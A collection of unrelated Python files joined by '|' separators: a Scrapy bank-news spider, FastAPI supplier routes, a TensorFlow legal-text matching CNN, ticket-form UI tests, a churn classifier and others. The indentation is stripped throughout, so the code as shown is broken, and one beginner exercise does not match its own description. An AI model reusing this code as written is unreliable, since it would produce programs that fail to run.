def create_token_type_ids_from_sequences(self,
token_ids_0,
token_ids_1=None):
if token_ids_1 is None:
return len(token_ids_0) * [0]
return len(token_ids_0) * [0] + len(token_ids_1 ) * [1] |
from utils.cab import Cab
from utils.googlemaps import GoogleMaps
from utils.execute_queries import ExecRawQuery
|
# Write a Python program to guess a number between 1 to 9. Go to the editor
# Note : User is prompted to enter a guess. If the user guesses wrong then the prompt appears again until the guess is correct, on successful guess, user will get a "Well guessed!" message, and the program will exit.
x=int(input("value of x"))
if x<=0:
print("gues is wrong")
elif x in range (1,10):
print("right")
|
import scrapy
from scrapy.exceptions import CloseSpider
from scrapy.loader import ItemLoader
from ..items import MerkantibankItem
from itemloaders.processors import TakeFirst
class MerkantibankSpider(scrapy.Spider):
name = 'merkantibank'
start_urls = ['http://www.merkantibank.com/English/corporate/news/2016/default.aspx']
page = 2016
def parse(self, response):
post_links = response.xpath('//a[@class="ModuleHeadlineLink"]/@href').getall()
yield from response.follow_all(post_links, self.parse_post)
self.page += 1
next_page = f'http://www.merkantibank.com/English/corporate/news/{self.page}/default.aspx'
if not post_links:
raise CloseSpider('no more pages')
yield response.follow(next_page, self.parse)
def parse_post(self, response):
title = response.xpath('//h1[@class="ModuleTitle ModuleDetailHeadline"]//text()').get()
description = response.xpath('//div[@class="xn-content"]//text()[normalize-space()]').getall()
description = [p.strip() for p in description]
description = ' '.join(description).strip()
date = response.xpath('//span[@class="ModuleDate"]/text()').get()
item = ItemLoader(item=MerkantibankItem(), response=response)
item.default_output_processor = TakeFirst()
item.add_value('title', title)
item.add_value('description', description)
item.add_value('date', date)
return item.load_item()
|
import socket
import protocol_utils as protocolUtils
socket_instance = socket.socket()
socket_instance.connect((protocolUtils.host, protocolUtils.port))
num1 = input("Ingrese un numero: ")
num2 = input("Ingrese un numero: ")
op = input("Ingrese la operacion a realizar: ")
message_builder = protocolUtils.MessageBuilder(num1, num2, op)
socket_instance.send(message_builder.message_builder().encode())
result = socket_instance.recv(1024)
print("Resultado de la operacion fue ", result.decode("utf-8"))
socket_instance.close()
|
import scrapy
import os
os.system("scrapy crawl BillBoard_Spider")
#os.system("scrapy crawl BoardSongs_Spider")
#os.system("scrapy crawl Music_Spider")
|
#
# Copyright (C) 2020-2021 Arm Limited or its affiliates and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Module in charge of handling SPDX documents.
SPDX file (i.e. tag-value format)
https://github.com/OpenChain-Project/curriculum/blob/master/guides/including_license_info.rst
https://github.com/david-a-wheeler/spdx-tutorial#spdx-files
https://github.com/OpenChain-Project/curriculum/blob/master/guides/reusing_software.md
https://github.com/vmware/tern/blob/c9a0c83369b92df58f7f80842aa15da5f63ed983/docs/spdx-tag-value-overview.md
Examples:
- https://spdx.org/spdx-tagvalue-example
- https://github.com/spdx/tools/blob/master/Examples/SPDXTagExample-v2.1.spdx
"""
|
from typing import List
from fastapi import APIRouter, Depends, HTTPException
from pydantic import PositiveInt
from sqlalchemy.orm import Session
from . import crud, schemas
from .database import get_db
router = APIRouter()
@router.get("/suppliers/{id}", response_model=schemas.Supplier2)
async def get_supplier(id: PositiveInt, db: Session = Depends(get_db)):
db_supplier = crud.get_supplier(db, id)
if db_supplier is None:
raise HTTPException(status_code=404, detail="Supplier not found")
return db_supplier
@router.get("/suppliers", response_model=List[schemas.Supplier])
async def get_suppliers(db: Session = Depends(get_db)):
return crud.get_suppliers(db)
@router.get("/suppliers/{id}/products")
async def get_suppliers_products(id: PositiveInt, db: Session = Depends(get_db)):
db_products = crud.get_supplier(db, id)
if db_products is None:
raise HTTPException(status_code=404, detail="Supplier not found")
db_product = crud.get_suppliers_products(db, id)
return [{"ProductID": db['ProductID'], 'ProductName': f"{db['ProductName']}",
'Category':{'CategoryID': db['CategoryID'],'CategoryName':f"{db['CategoryName']}"},
'Discontinued':db['Discontinued'] } for db in db_product]
@router.post("/suppliers", response_model=schemas.Supplier2, status_code=201)
async def post_supplier(new_supplier: schemas.SupplierPost, db: Session = Depends(get_db)):
return crud.create_supplier(db, new_supplier)
@router.put("/suppliers/{id}", response_model=schemas.Supplier2)
async def put_supplier(id: PositiveInt, put_supplier: schemas.SupplierPut, db: Session = Depends(get_db)):
db_supplier = crud.get_supplier(db, id)
if db_supplier is None:
raise HTTPException(status_code=404, detail="Supplier not found")
db_supplier = crud.put_supplier(db, id, put_supplier)
return db_supplier
@router.delete("/suppliers/{id}", status_code=204)
async def delete_supplier(id: PositiveInt, db: Session = Depends(get_db)):
db_supplier = crud.get_supplier(db, id)
if db_supplier is None:
raise HTTPException(status_code=404, detail="Supplier not found")
crud.delete_supplier(db, id)
#############################
@router.get("/shippers/{shipper_id}", response_model=schemas.Shipper)
async def get_shipper(shipper_id: PositiveInt, db: Session = Depends(get_db)):
db_shipper = crud.get_shipper(db, shipper_id)
if db_shipper is None:
raise HTTPException(status_code=404, detail="Shipper not found")
return db_shipper
@router.get("/shippers", response_model=List[schemas.Shipper])
async def get_shippers(db: Session = Depends(get_db)):
return crud.get_shippers(db) |
#William U. Clark, Jr.
#netrek@wuclark.com
#save player one player's stats from statdump to file
#usage findPlayer.py PNUM input output
#!/usr/bin/env python
import sys
inData = open(sys.argv[2],'r').readlines()
outFile = open(sys.argv[3],'w')
for line in inData:
if line.startswith('STATS_SP_PLAYER:\t%d\t'%int(sys.argv[1])):
outFile.write(line.strip()+"\n")
outFile.close()
|
# 加入上下文的gate2 in model5
# 添加多级先验知识,并且上一层级得到的[1,d]的score会传入下一层的下一级的计算中,使用的每层计算的权重是两个[d,1]的
import tensorflow as tf
class ModelConfig(object):
def __init__(self):
self.EMBEDDING_DIM = 128 # 词向量维度
self.FACT_LEN = 30 # 事实长度
self.LAW_LEN = 30 # 法条长度
self.KS_LEN = 3 # 先验知识长度
self.FILTERS = 256
self.KERNEL_SIZE = 5 # 卷积核尺寸
self.NUM_CLASS = 2 # 类别数
self.NUM_LAYERS = 2
self.HIDDEN_DIM = 128
self.LEARNING_RATE = 0.001 # 学习率
self.batch_size = 128 # 批处理参数,每次训练跑的数据集样本数
self.num_epochs = 200 # 跑遍整个数据集的次数
self.save_per_batch = 10 # 每训练10次保存和打印一次
self.print_per_batch = 10
self.dropout_keep_prob = 0.5 # 以0.5的概率去除部分连接防止过拟合
class CNN(object):
def __init__(self, config):
print("IN RIGHT MODEL")
self.config = config
self.input_x1 = tf.placeholder(tf.float32, [None, self.config.FACT_LEN, self.config.EMBEDDING_DIM],
name='input_x1') # 输入1:事实[ ,30,128]
self.input_x2 = tf.placeholder(tf.float32, [None, self.config.LAW_LEN, self.config.EMBEDDING_DIM],
name='input_x2') # 输入2:法条[ ,30,128]
self.input_ks = tf.placeholder(tf.float32, [None, self.config.KS_LEN, self.config.EMBEDDING_DIM],
name="input_ks") # 输入3:先验知识[ ,3,128]
self.input_y = tf.placeholder(tf.int32, [None, self.config.NUM_CLASS],
name='input_y') # 输入4:分类数[ ,2]
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
self.cnn()
return
def cnn(self):
# 获得第一、二个通道的事实特征提取结果
new_x1 = self.gate_con(self.input_ks, self.input_x1)
new_x1_word = self.gate_word(self.input_ks, self.input_x1)
# 事实特征提取结果经过维度转换,作为法条特征提取的先验知识
new_x1_mean = self.process_fact(new_x1)
new_x1_mean_word = self.process_fact(new_x1_word)
# 获得第一、二个通道的法条特征提取结果
new_x2 = self.mirror_gate_con(new_x1_mean, self.input_x2)
new_x2_word = self.mirror_gate_word(new_x1_mean_word, self.input_x2)
# 获得第三个通道的事实和法条特征提取结果
x1_bi, x2_bi = self.rnn()
# 使用注意力机制并完成特征向量连接
op = self.conv(new_x1_word, new_x2_word, new_x1, new_x2, x1_bi, x2_bi)
# 全连接层分类并度量准确率和损失
self.match(op)
# 用与法条相关的先验知识过滤事实内容
def gate_con(self, ks, input_x):
with tf.name_scope("gate_con"):
# 随机生成权重初始值
weight_1 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
stddev=0, seed=1), trainable=True, name='w1')
weight_2 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
stddev=0, seed=2), trainable=True, name='w2')
weight_3 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
stddev=0, seed=3), trainable=True, name='w3')
# 抽取出分级的原始先验知识
k_1_init, k_2_init, k_3_init = ks[:, 0, :], ks[:, 1, :], ks[:, 2, :]
k_1 = tf.reshape(tf.keras.backend.repeat_elements(k_1_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
k_2 = tf.reshape(tf.keras.backend.repeat_elements(k_2_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
k_3 = tf.reshape(tf.keras.backend.repeat_elements(k_3_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
# 事实进行结合上下文的线性变化
fun1 = tf.einsum('abd,bde->abe', input_x, weight_1)
fun2 = tf.transpose(fun1, perm=[0, 2, 1])
fun3 = tf.reduce_mean(fun2, axis=2, keep_dims=True)
fun3_epd = tf.expand_dims(fun3, axis=2)
# 第二级先验知识作用于事实
# [ ,30,1,128]
ksw_1 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun3_epd, k_2)))
# 事实进行结合上下文的线性变化
fun4 = tf.einsum('abd,bde->abe', input_x, weight_2)
fun5 = tf.transpose(fun4, perm=[0, 2, 1])
fun6 = tf.reduce_mean(fun5, axis=2, keep_dims=True)
fun6_epd = tf.expand_dims(fun6, axis=2)
fun6_epd1 = tf.keras.backend.repeat_elements(fun6_epd, rep=2, axis=3)
# print('fun6:', fun6_epd1.shape,flush=True)
# 第三级先验知识和上文得到的作用结果一起作为先验知识作用于事实
ksw_2 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun6_epd1, tf.concat([k_3, ksw_1], axis=2))))
# 事实进行结合上下文的线性变化
fun7 = tf.einsum('abd,bde->abe', input_x, weight_3)
fun8 = tf.transpose(fun7, perm=[0, 2, 1])
fun9 = tf.reduce_mean(fun8, axis=2, keep_dims=True)
fun9_epd = tf.expand_dims(fun9, axis=2)
fun9_epd1 = tf.keras.backend.repeat_elements(fun9_epd, rep=2, axis=3)
# 第一级先验知识和上文得到的作用结果一起作为先验知识作用于事实
ksw_3 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun9_epd1, tf.concat([k_1, ksw_2], axis=2))))
input_x_epd = tf.expand_dims(input_x, axis=2)
# 连接
n_vector_ = (ksw_1 + ksw_2 + ksw_3) * input_x_epd
n_vector = tf.reshape(n_vector_, shape=[-1, self.config.FACT_LEN, self.config.EMBEDDING_DIM])
return n_vector
def gate_word(self, ks, input_x):
with tf.name_scope("gate_word"):
weight_1 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 1],
stddev=0, seed=1), trainable=True, name='w1')
weight_2 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 2],
stddev=0, seed=2), trainable=True, name='w2')
weight_3 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 2],
stddev=0, seed=3), trainable=True, name='w3')
k_1_init, k_2_init, k_3_init = ks[:, 0, :], ks[:, 1, :], ks[:, 2, :] # 分别切取先验知识的0,1,2行
k_1 = tf.reshape(tf.keras.backend.repeat_elements(k_1_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM]) # [ ,30,1,128]变形
k_2 = tf.reshape(tf.keras.backend.repeat_elements(k_2_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
k_3 = tf.reshape(tf.keras.backend.repeat_elements(k_3_init, rep=self.config.FACT_LEN, axis=1),
shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
input_x_epd = tf.expand_dims(input_x, axis=2)
# fun1[a,b,c,e]=input_x_epd[a,b,c,d]*weight_1[d,e]
fun1 = tf.einsum('abcd,de->abce', input_x_epd, weight_1) # 事实与权重
ksw_1 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun1, k_2)))
# fun2[ ,30,1,2]
fun2 = tf.einsum('abcd,de->abce', input_x_epd, weight_2)
# print('fun2:', fun2.shape, flush=True)
# print('k_3:', k_3.shape, flush=True)
# print('ksw_1:', ksw_1.shape, flush=True)
ksw_2 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun2, tf.concat([k_3, ksw_1], axis=2))))
# fun3[a,b,c,e]=input_x_epd[a,b,c,d]*weight_3[d,e]
fun3 = tf.einsum('abcd,de->abce', input_x_epd, weight_3)
ksw_3 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun3, tf.concat([k_1, ksw_2], axis=2))))
# 连接
n_vector_ = (ksw_1 + ksw_2 + ksw_3) * input_x_epd
n_vector = tf.reshape(n_vector_, shape=[-1, self.config.FACT_LEN, self.config.EMBEDDING_DIM])
return n_vector
def process_fact(self, input_x):
with tf.name_scope("FactProcess"):
input_x_ = tf.transpose(input_x, perm=[0, 2, 1])
# input_x_的每行最大的5个数,[0]表示只要数值,不要位置
input_x_k = tf.transpose((tf.nn.top_k(input_x_, k=5, sorted=False))[0], perm=[0, 2, 1])
input_x_mean = tf.reduce_mean(input_x_k, axis=1)
return input_x_mean
# 根据事实作为先验知识过滤法条
def mirror_gate_con(self, input_x, input_y):
with tf.name_scope("Fact2Law"):
weight_1 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
stddev=0, seed=1), trainable=True, name='w1')
ss_epd = tf.reshape(tf.keras.backend.repeat_elements(input_x, rep=self.config.LAW_LEN, axis=1),
shape=[-1, self.config.LAW_LEN, 1, self.config.EMBEDDING_DIM])
law_epd = tf.expand_dims(input_y, axis=2)
# 线性变化
fun = tf.einsum('abd,bde->abe', input_y, weight_1)
fun1 = tf.transpose(fun, perm=[0, 2, 1])
fun2 = tf.reduce_mean(fun1, axis=2, keep_dims=True)
fun2_epd = tf.expand_dims(fun2, axis=2)
# 以事实为先验知识过滤法条内容
ksw = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abde->abce', fun2_epd, ss_epd)))
n_vector_ = ksw * law_epd
n_vector = tf.reshape(n_vector_, shape=tf.shape(input_y))
return n_vector
def mirror_gate_word(self, input_x, input_y):
with tf.name_scope("Fact2Law_word"):
weight_1 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 1],
stddev=0, seed=1), trainable=True, name='w1')
ss_epd = tf.reshape(tf.keras.backend.repeat_elements(input_x, rep=self.config.LAW_LEN, axis=1),
shape=[-1, self.config.LAW_LEN, 1, self.config.EMBEDDING_DIM]) # [b,l,1,d]
# 输入的法条变成[ ,30,1,128]
law_epd = tf.expand_dims(input_y, axis=2)
# fun[a,b,c,e] = law_epd[a,b,c,d]*weight_1[d,e]
fun = tf.einsum('abcd,de->abce', law_epd, weight_1)
# [a,b,c,e] = fun[a,b,c,d]*ss_epd[a,b,d,e]经过relu和sigmoid得到ksw
ksw = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abde->abce', fun, ss_epd)))
# 输出形式[ ,30,128]
n_vector_ = ksw * law_epd
n_vector = tf.reshape(n_vector_, shape=tf.shape(input_y))
return n_vector
def lstm_cell(self): # lstm核
return tf.contrib.rnn.BasicLSTMCell(self.config.HIDDEN_DIM, state_is_tuple=True)
def dropout(self): # 为每一个rnn核后面加一个dropout层
cell = self.lstm_cell()
return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob)
def rnn(self):
with tf.name_scope("rnn1"):
# 多层rnn网络
with tf.variable_scope("rnn1v"):
cells_1 = [self.dropout() for _ in range(self.config.NUM_LAYERS)]
rnn_cell_1 = tf.contrib.rnn.MultiRNNCell(cells_1, state_is_tuple=True)
_outputs_1, state_1 = tf.nn.dynamic_rnn(cell=rnn_cell_1, inputs=self.input_x1, dtype=tf.float32,
time_major=False)
# time_major等于 false代表输入和输出的格式是[batch_size, max_time, depth]
with tf.name_scope("rnn2"):
# 多层rnn网络
with tf.variable_scope("rnn2v"):
cells_2 = [self.dropout() for _ in range(self.config.NUM_LAYERS)]
rnn_cell_2 = tf.contrib.rnn.MultiRNNCell(cells_2, state_is_tuple=True)
_outputs_2, state_2 = tf.nn.dynamic_rnn(cell=rnn_cell_2, inputs=self.input_x2, dtype=tf.float32,
time_major=False)
# time_major等于 false代表输入和输出的格式是[batch_size, max_time, depth]
return _outputs_1, _outputs_2
# 生成卷积
# bi通道shape[128,30,256],剩下两个[128,30,128]
def conv(self, x_word, y_word, input_x, input_y, x_bi, y_bi):
with tf.name_scope("attention"):
# 对三个通道提取的三组特征做attention
dot1 = tf.matmul(x_bi, y_bi, adjoint_b=True)
self.beta1 = tf.nn.softmax(dot1, axis=2)
self.alpha1 = tf.nn.softmax(dot1, axis=1)
dot2 = tf.matmul(x_word, y_word, adjoint_b=True)
self.beta2 = tf.nn.softmax(dot2, axis=2)
self.alpha2 = tf.nn.softmax(dot2, axis=1)
dot3 = tf.matmul(input_x, input_y, adjoint_b=True)
self.beta3 = tf.nn.softmax(dot3, axis=2)
self.alpha3 = tf.nn.softmax(dot3, axis=1)
with tf.name_scope('cnn1'):
conv1 = tf.layers.conv1d(self.beta1, self.config.FILTERS, self.config.KERNEL_SIZE, name='conv1')
gmp1 = tf.reduce_max(conv1, reduction_indices=[1], name='gmp1')
with tf.name_scope('cnn2'):
conv2 = tf.layers.conv1d(self.alpha1, self.config.FILTERS, self.config.KERNEL_SIZE, name='conv2')
gmp2 = tf.reduce_max(conv2, reduction_indices=[1], name='gmp2')
with tf.name_scope("cnn3"):
# CNN layer
with tf.variable_scope("cnn-var1"):
conv3 = tf.layers.conv1d(self.input_x1, self.config.FILTERS, self.config.KERNEL_SIZE,
name='conv3') # (?,26,256)
gmp3 = tf.reduce_max(conv3, reduction_indices=[1], name='gmp3') # (?,256)
with tf.name_scope("cnn4"):
# CNN layer
with tf.variable_scope("cnn-var2"):
conv4 = tf.layers.conv1d(self.input_x2, self.config.FILTERS, self.config.KERNEL_SIZE,
name='conv4') # (?,46,256)
gmp4 = tf.reduce_max(conv4, reduction_indices=[1], name='gmp4') # (?,256)
with tf.name_scope("cnn5"):
conv5 = tf.layers.conv1d(self.beta2, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
name='conv5')
gmp5 = tf.reduce_max(conv5, reduction_indices=[1], name='gmp5')
with tf.name_scope("cnn6"):
conv6 = tf.layers.conv1d(self.alpha2, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
name='conv6')
gmp6 = tf.reduce_max(conv6, reduction_indices=[1], name='gmp6')
with tf.name_scope("cnn7"):
conv7 = tf.layers.conv1d(self.beta3, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
name='conv7')
gmp7 = tf.reduce_max(conv7, reduction_indices=[1], name='gmp7')
with tf.name_scope("cnn8"):
conv8 = tf.layers.conv1d(self.alpha3, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
name='conv8')
gmp8 = tf.reduce_max(conv8, reduction_indices=[1], name='gmp8')
with tf.name_scope("concat"):
concat = tf.concat([gmp1, gmp2, gmp5, gmp6, gmp7, gmp8, gmp3, gmp4], 1)
return concat
# op size[128,256]
def match(self, op):
with tf.name_scope("match_c3"):
fc = tf.layers.dense(inputs=op, units=self.config.HIDDEN_DIM, name="fc3_3")
fc = tf.contrib.layers.dropout(fc, self.keep_prob)
fc = tf.nn.relu(fc)
# 分类器
self.logits = tf.layers.dense(fc, self.config.NUM_CLASS,
name='fc4_3')
# softmax将向量上的数值映射成概率,argmax选出做大概率所在的索引值
self.y_pred_cls = tf.argmax(tf.nn.softmax(self.logits), 1)
with tf.name_scope("optimize_c3"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,
labels=self.input_y)
# 交叉熵
self.loss = tf.reduce_mean(cross_entropy)
# 优化器
self.optim = tf.train.AdamOptimizer(learning_rate=self.config.LEARNING_RATE).minimize(self.loss)
with tf.name_scope("accuracy_c3"):
# 准确率
correct_pred = tf.equal(tf.argmax(self.input_y, 1),
self.y_pred_cls)
self.acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
|
import unittest
from src.dl.flaskapp.transactions.parsers.transaction_factory import TransactionReaderFactory
from src.dl.flaskapp.transactions.parsers.csv_readers import CapitalOneAutoDataReader
class TransactionFactoryTest(unittest.TestCase):
def test_is_capital_one_auto_trans(self):
the_reader = TransactionReaderFactory.get_transaction_reader("/Users/Paul/Downloads/data/coa.csv")
self.assertIsNotNone(the_reader)
self.assertTrue(isinstance(the_reader, CapitalOneAutoDataReader))
|
'''
Test requirements according to R4
'''
from unittest.mock import patch
from qa327_test.conftest import base_url
from qa327_test.frontend.geek_base import GeekBaseCase, TEST_USER
from qa327.models import Ticket
from qa327.ticket_format import parse_date
# Test Information
GOOD_TICKET = Ticket(
name='helloworld',
seller_id='1',
price='20',
quantity='20',
expires="20220101"
)
GOOD_TICKET_DICT = [{'name': 'helloworld', 'price': '20', 'owner': 'jesus', 'quantity': '20'}]
INVALID_NAME_FORMATS = ['bad', ' alsobad', 'alsobad ', '$alsobad$',
'veeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeerylongname']
INVALID_QUANTITIES = ['-1', '101']
INVALID_PRICES = ['5', '101']
INVALID_DATES = ['January 1 2024', '20200204']
class R4Test(GeekBaseCase):
'''
Contains test cases specific to R4
'''
@patch('qa327.backend.get_user', return_value=TEST_USER)
def test_ticket_name(self, *_):
'''
See r4.1/r4.2 - Negative
Checks all invalid formats with spaces, special characters,
and name length
'''
self.login_test_user()
self.open(base_url)
for name in INVALID_NAME_FORMATS:
self.input('#sell-ticket-name', name)
self.input('#sell-ticket-quantity', GOOD_TICKET.quantity)
self.input('#sell-ticket-price', GOOD_TICKET.price)
self.input('#sell-ticket-expiration-date', '20220101')
self.click('#sell-submit')
self.assert_flash('Invalid ticket name')
@patch('qa327.backend.get_user', return_value=TEST_USER)
def test_ticket_quantity(self, *_):
'''
See r4.3 - Negative
Checks all invalid ticket quantities
'''
self.login_test_user()
self.open(base_url)
for quantity in INVALID_QUANTITIES:
self.input('#sell-ticket-name', GOOD_TICKET.name)
self.input('#sell-ticket-quantity', quantity)
self.input('#sell-ticket-price', GOOD_TICKET.price)
self.input('#sell-ticket-expiration-date', '20220101')
self.click('#sell-submit')
self.assert_flash('Invalid ticket quantity')
@patch('qa327.backend.get_user', return_value=TEST_USER)
def test_ticket_price(self, *_):
'''
See r4.4 - Negative
Checks all invalid ticket prices
'''
self.login_test_user()
self.open(base_url)
for price in INVALID_PRICES:
self.input('#sell-ticket-name', GOOD_TICKET.name)
self.input('#sell-ticket-quantity', GOOD_TICKET.quantity)
self.input('#sell-ticket-price', price)
self.input('#sell-ticket-expiration-date', '20220101')
self.click('#sell-submit')
self.assert_flash('Invalid ticket price')
@patch('qa327.backend.get_user', return_value=TEST_USER)
def test_ticket_date(self, *_):
'''
See r4.5 - Negative
Checks all invalid ticket expiration dates
'''
self.login_test_user()
self.open(base_url)
for date in INVALID_DATES:
self.input('#sell-ticket-name', GOOD_TICKET.name)
self.input('#sell-ticket-quantity', GOOD_TICKET.quantity)
self.input('#sell-ticket-price', GOOD_TICKET.price)
self.input('#sell-ticket-expiration-date', date)
self.click('#sell-submit')
self.assert_flash('Invalid ticket date')
@patch('qa327.backend.get_user', return_value=TEST_USER)
@patch('qa327.backend.sell_ticket', return_value='ticket sold successfully')
@patch('qa327.backend.get_all_tickets')
def test_good_ticket(self, get_all_tickets_function, *_):
'''
See r4.6
Ticket with proper format will be posted to profile page
'''
self.login_test_user()
self.open(base_url)
get_all_tickets_function.return_value = []
self.input('#sell-ticket-name', GOOD_TICKET.name)
self.input('#sell-ticket-quantity', GOOD_TICKET.quantity)
self.input('#sell-ticket-price', GOOD_TICKET.price)
self.input('#sell-ticket-expiration-date', GOOD_TICKET.expires)
self.click('#sell-submit')
self.assert_flash('ticket sold successfully')
get_all_tickets_function.return_value = GOOD_TICKET_DICT
self.refresh()
name = GOOD_TICKET.name
ticket_div = self.find_element(f'#tickets .ticket[name={name}]')
for prop, value in GOOD_TICKET_DICT[0].items():
displayed_text = ticket_div.find_element_by_class_name(prop).text
self.assertEqual(displayed_text, str(value))
|
import database
from flask import Blueprint, make_response, json, request
import pymongo
from bson.objectid import ObjectId
# Blueprint Configuration
doc_bp = Blueprint('sort_bp', __name__,
template_folder='templates',
static_folder='build/',
url_prefix='/')
db = database.Database()
@doc_bp.route('/filter/<string:which>/<string:criteria>', methods=['GET'])
def filters(which, criteria):
docs = db.filter(which, criteria)
for d in docs:
d['_id'] = str(d['_id'])
docs = json.dumps(docs)
response = make_response(
docs, 200, {'Content-Type': 'application/json'})
response.headers['Access-Control-Allow-Origin'] = '*'
return response
|
from __future__ import division, print_function
from pdb import set_trace
import pandas as pd
import numpy as np
from os import walk
from random import randint as randi, seed as rseed
__author__ = 'rkrsn'
def where(data):
"""
Recursive FASTMAP clustering.
"""
rseed(0)
if isinstance(data, pd.core.frame.DataFrame):
data = data.as_matrix()
if not isinstance(data, np.ndarray):
raise TypeError('Incorrect data.dat format. Must be a pandas data.dat Frame, or a numpy nd-array.')
N = np.shape(data)[0]
clusters = []
norm = np.max(data, axis=0)[:-1] -np.min(data, axis=0)[:-1]
def aDist(one, two):
return np.sqrt(np.sum((np.array(one[:-1])/norm-np.array(two[:-1])/norm)**2))
def farthest(one,rest):
return sorted(rest, key=lambda F: aDist(F,one))[-1]
def recurse(dataset):
R, C = np.shape(dataset) # No. of Rows and Col
# Find the two most distance points.
one=dataset[randi(0,R-1)]
mid=farthest(one, dataset)
two=farthest(mid, dataset)
# Project each case on
def proj(test):
a = aDist(one, test)
b = aDist(two, test)
c = aDist(one, two)
return (a**2-b**2+c**2)/(2*c)
if R<np.sqrt(N):
clusters.append(dataset)
else:
_ = recurse(sorted(dataset,key=lambda F:proj(F))[:int(R/2)])
_ = recurse(sorted(dataset,key=lambda F:proj(F))[int(R/2):])
recurse(data)
return clusters
def _test(dir='../data.dat/Jureczko/ant/'):
files=[]
for (dirpath, _, filename) in walk(dir):
for f in filename:
df=pd.read_csv(dirpath+f)
headers = [h for h in df.columns if '?' not in h]
files.append(df[headers])
"For N files in a project, use 1 to N-1 as train."
train = pd.concat(files[:-1])
clusters = where(train)
# ----- ::DEBUG:: -----
set_trace()
if __name__=='__main__':
_test() |
# --------------
import pandas as pd
from sklearn.model_selection import train_test_split
#path - Path of file
# Code starts here
df = pd.read_csv(path)
X = df.drop(['customerID','Churn'],1)
y = df['Churn'].copy()
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.3, random_state = 0)
# --------------
import numpy as np
from sklearn.preprocessing import LabelEncoder
# Code starts here
X_train['TotalCharges'] = X_train['TotalCharges'].replace({' ':np.NaN})
X_test['TotalCharges'] = X_test['TotalCharges'].replace({' ':np.NaN})
X_train['TotalCharges'] = X_train['TotalCharges'].astype(float)
X_test['TotalCharges'] = X_test['TotalCharges'].astype(float)
X_train['TotalCharges'].fillna(value=np.mean(X_train['TotalCharges']), inplace=True)
X_test['TotalCharges'].fillna(value=np.mean(X_test['TotalCharges']), inplace=True)
print(X_train['TotalCharges'].isnull().sum())
print(X_test['TotalCharges'].isnull().sum())
le = LabelEncoder()
cat_col = list(X_train.select_dtypes(include = 'object').columns)
for i in cat_col:
X_train[i] = le.fit_transform(X_train[i])
X_test[i] = le.fit_transform(X_test[i])
y_train = y_train.replace({'No':0, 'Yes':1})
y_test = y_test.replace({'No':0, 'Yes':1})
# --------------
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix
# Code starts here
print(X_train.head())
print(y_train.head())
print(X_test.head())
print(y_test.head())
ada_model = AdaBoostClassifier(random_state=0)
ada_model.fit(X_train, y_train)
y_pred = ada_model.predict(X_test)
ada_score = accuracy_score(y_test, y_pred)
print(ada_score)
ada_cm = confusion_matrix(y_test, y_pred)
print(ada_cm)
ada_cr = classification_report(y_test, y_pred)
print(ada_cr)
# --------------
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
#Parameter list
parameters={'learning_rate':[0.1,0.15,0.2,0.25,0.3],
'max_depth':range(1,3)}
# Code starts here
#XGBoost
xgb_model = XGBClassifier(random_state=0)
xgb_model.fit(X_train, y_train)
y_pred = xgb_model.predict(X_test)
xgb_score = accuracy_score(y_test, y_pred)
print("XGBoost:-")
print("Accuracy: ",xgb_score)
xgb_cm = confusion_matrix(y_test, y_pred)
print('Confusion matrix: \n',xgb_cm)
xgb_cr = classification_report(y_test, y_pred)
print('Classification report: \n',xgb_cr)
#GridSearchCV
clf_model = GridSearchCV(estimator=xgb_model, param_grid=parameters)
clf_model.fit(X_train, y_train)
y_pred = clf_model.predict(X_test)
clf_score = accuracy_score(y_test, y_pred)
print("GridSearchCV:-")
print("Accuracy: ",clf_score)
clf_cm = confusion_matrix(y_test, y_pred)
print('Confusion matrix: \n',clf_cm)
clf_cr = classification_report(y_test, y_pred)
print('Classification report: \n',clf_cr)
|
import collections
import json
from typing import Dict, NamedTuple
import torch
import torch.distributed as dist
import torch.nn as nn
from absl import app
from absl import flags
from absl import logging
from torch.utils.data import distributed as dist_data
import trainer
import utils.tensorboard as tb
from data import data
from hydraulics import boundary
from hydraulics import saint_venant
from models import detour
